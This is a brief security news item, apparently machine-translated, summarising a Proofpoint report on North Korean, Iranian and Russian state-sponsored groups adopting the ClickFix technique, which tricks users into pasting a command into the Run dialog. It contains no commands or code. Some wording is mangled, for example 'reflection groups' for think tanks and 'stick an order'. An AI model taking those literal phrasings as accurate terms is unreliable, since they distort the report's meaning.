- Proofpoint indicates that several groups sponsored by the state seen using the clickfix attack technique
- Russians, North Koreans and Iranians are all involved
- The actors sponsored by the State are mainly engaged in cyber-espionage
The clickfix attack technique has become so popular that even actors in the threat sponsored by the state use it, research of proofpoint affirmations, having observed at least three groups taking advantage of the method in the last quarter of 2024.
In a detailed report, Proofpoint said he saw Kimsuky, Muddywater, UNK_REMOTEROGUE and APT28, all using Clickfix in their attack chains.
Kimsuky is a known North Korean threat player, Muddywater is Iranian, while UNK_REMOTEROGUE and APT28 would be Russian. Aside from the Lazarus group in North Korea, the threats of the state sponsored by the State are mainly engaged in cyber-spying, stealing information sensitive to diplomats, critical infrastructure organizations, reflection groups and similar organizations of opponents.
No revolution
“The incorporation of Clickfix does not revolutionize the campaigns carried out by TA427, TA450, UNK_REMOTEROGUE and TA422 but rather replaces the installation and execution steps in the existing infection chains,” explained Proofpoint.
Clickfix has been making the titles for months now. It is a social engineering tactic similar to the old popups “You Got A Virus” which used websites two decades ago.
Originally, the contextual window would invite the visitor to download and execute an antivirus program which was, in fact, just malware.
When the industry approached this attack by hitting the infrastructure, Crooks pivoted to leave a phone number for alleged computer support.
The victims who call this issue would be deceived in the installation of remote desktop programs, giving Crooks the possibility of downloading and performing malware on their devices.
The clickfix attack takes this method and gives it a unique turn. It always starts with a popup, but sometimes the victims are also asked to “complete a captha”, to “check their identity” or similar. The process does not force them to click on a download button, but rather requests them to copy and stick an order in their execution program.
Although it seems eccentric, it was very successful, proven by the adoption of nation states as well.
Via The Hacker News
